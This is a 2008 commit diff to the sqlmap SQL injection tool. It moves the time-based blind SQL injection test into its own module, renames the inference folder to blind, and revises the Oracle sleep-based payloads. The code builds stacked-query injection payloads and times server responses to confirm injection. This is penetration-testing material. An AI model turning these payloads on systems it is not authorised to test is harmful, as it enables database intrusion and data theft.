Properly moved and improved inject.goStacked() function and newly

implemented Time based blind SQL injection now is a single test file within the lib/techniques/ folder. Renamed lib/techniques/inference to lib/techniques/blind, it is more approriate and adapted the rest of the libraries. Updated ChangeLog file.
2024-11-22 01:26:42 +03:00 · 2008-11-12 23:44:09 +00:00 · 2008-11-12 23:44:09 +00:00 · ecc4a98071
commit ecc4a98071
parent 9329f8c9c4
10 changed files with 63 additions and 31 deletions
--- a/doc/ChangeLog
+++ b/doc/ChangeLog
@ -2,10 +2,17 @@ sqlmap (0.6.3-1) stable; urgency=low

  * Minor enhancement to be able to specify the number of seconds to wait
    between each HTTP request;
+  * Minor enhancement to be able to enumerate table columns and dump table
+    entries also if the database name is not provided by using the current
+    database on MySQL and MSSQL, the 'public' scheme on PostgreSQL and the
+    'USERS' TABLESPACE_NAME on Oracle;
  * Minor improvements to sqlmap Debian package files: sqlmap uploaded
    to official Debian project repository;
  * Minor bug fix to handle session.error and session.timeout in HTTP
    requests;
+  * Minor bug fix so that when the user provide a SELECT statement to be
+    processed with an asterisk as columns, now it also work if in the FROM
+    there is no database name specified;
  * Minor bug fix to correctly dump table entries when the column is
    provided;

--- a/lib/controller/action.py
+++ b/lib/controller/action.py
@ -31,6 +31,7 @@ from lib.core.data import kb
 from lib.core.dump import dumper
 from lib.core.exception import sqlmapUnsupportedDBMSException
 from lib.core.settings import SUPPORTED_DBMS
+from lib.techniques.blind.timebased import timeTest
 from lib.techniques.inband.union.test import unionTest


@ -70,7 +71,7 @@ def action():

    # Techniques options
    if conf.timeTest:
-        dumper.string("time based sql injection", conf.dbmsHandler.timeTest())
+        dumper.string("time based blind sql injection payload", timeTest())

    if conf.unionTest:
        dumper.string("valid union", unionTest())
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@ -65,4 +65,4 @@ ORACLE_ALIASES    = [ "oracle", "orcl", "ora", "or" ]

 SUPPORTED_DBMS    = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES

-TIME_SECONDS      = 5
+TIME_DELAY        = 5
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@ -38,10 +38,10 @@ from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import queries
 from lib.core.data import temp
-from lib.core.settings import TIME_SECONDS
+from lib.core.settings import TIME_DELAY
 from lib.request.connect import Connect as Request
 from lib.techniques.inband.union.use import unionUse
-from lib.techniques.inference.blind import bisection
+from lib.techniques.blind.inference import bisection
 from lib.utils.resume import queryOutputLength
 from lib.utils.resume import resume

@ -388,8 +388,9 @@ def goStacked(expression, timeTest=False):
    TODO: write description
    """

+    comment        = queries[kb.dbms].comment
    query          = agent.prefixQuery("; %s" % expression)
-    query          = agent.postfixQuery(query)
+    query          = agent.postfixQuery("%s; %s" % (query, comment))
    payload        = agent.payload(newValue=query)

    start    = time.time()
@ -397,6 +398,6 @@ def goStacked(expression, timeTest=False):
    duration = int(time.time() - start)

    if timeTest:
-        return (duration >= TIME_SECONDS, payload)
+        return (duration >= TIME_DELAY, payload)
    else:
-        return duration >= TIME_SECONDS
+        return duration >= TIME_DELAY
--- a/lib/techniques/inference/init.py
+++ b/lib/techniques/inference/init.py
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
--- a/lib/techniques/blind/timebased.py
+++ b/lib/techniques/blind/timebased.py
@ -0,0 +1,45 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+
+
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.data import queries
+from lib.core.settings import TIME_DELAY
+from lib.request import inject
+
+
+def timeTest():
+    infoMsg  = "testing time based blind sql injection on parameter "
+    infoMsg += "'%s'" % kb.injParameter
+    logger.info(infoMsg)
+
+    query    = queries[kb.dbms].timedelay % TIME_DELAY
+    timeTest = inject.goStacked(query, timeTest=True)
+
+    if timeTest[0] == True:
+        return timeTest[1]
+    else:
+        return None
--- a/lib/utils/resume.py
+++ b/lib/utils/resume.py
@ -32,7 +32,7 @@ from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import queries
 from lib.core.unescaper import unescaper
-from lib.techniques.inference.blind import bisection
+from lib.techniques.blind.inference import bisection


 def queryOutputLength(expression, payload):
--- a/plugins/generic/enumeration.py
+++ b/plugins/generic/enumeration.py
@ -39,7 +39,6 @@ from lib.core.exception import sqlmapMissingMandatoryOptionException
 from lib.core.exception import sqlmapNoneDataException
 from lib.core.exception import sqlmapUndefinedMethod
 from lib.core.exception import sqlmapUnsupportedFeatureException
-from lib.core.settings import TIME_SECONDS
 from lib.core.shell import autoCompletion
 from lib.core.unescaper import unescaper
 from lib.request import inject
@ -69,27 +68,6 @@ class Enumeration:
        temp.inference              = queries[dbms].inference


-    # TODO: move this function to an appropriate file
-    def timeTest(self):
-        infoMsg  = "testing time based blind sql injection on parameter "
-        infoMsg += "'%s'" % kb.injParameter
-        logger.info(infoMsg)
-
-        # TODO: probably the '; <COMMENT>' will be filled in in all
-        # future time based SQL injection attacks at the end of the
-        # stacked query. Find a way that goStacked() function itself
-        # append it.
-        query  = "%s; " % queries[kb.dbms].timedelay % TIME_SECONDS
-        query += queries[kb.dbms].comment
-
-        self.timeTest = inject.goStacked(query, timeTest=True)
-
-        if self.timeTest[0] == True:
-            return "True, verified with payload: %s" % self.timeTest[1]
-        else:
-            return "False"
-
-
    def forceDbmsEnum(self):
        pass

--- a/xml/queries.xml
+++ b/xml/queries.xml
@ -72,7 +72,7 @@
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
        <comment query="--"/>
-        <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="SELECT UTL_INADDR.get_host_name('10.0.0.%d') FROM DUAL"/>
+        <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/>
        <substring query="SUBSTR((%s), %d, %d)"/>
        <inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
        <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>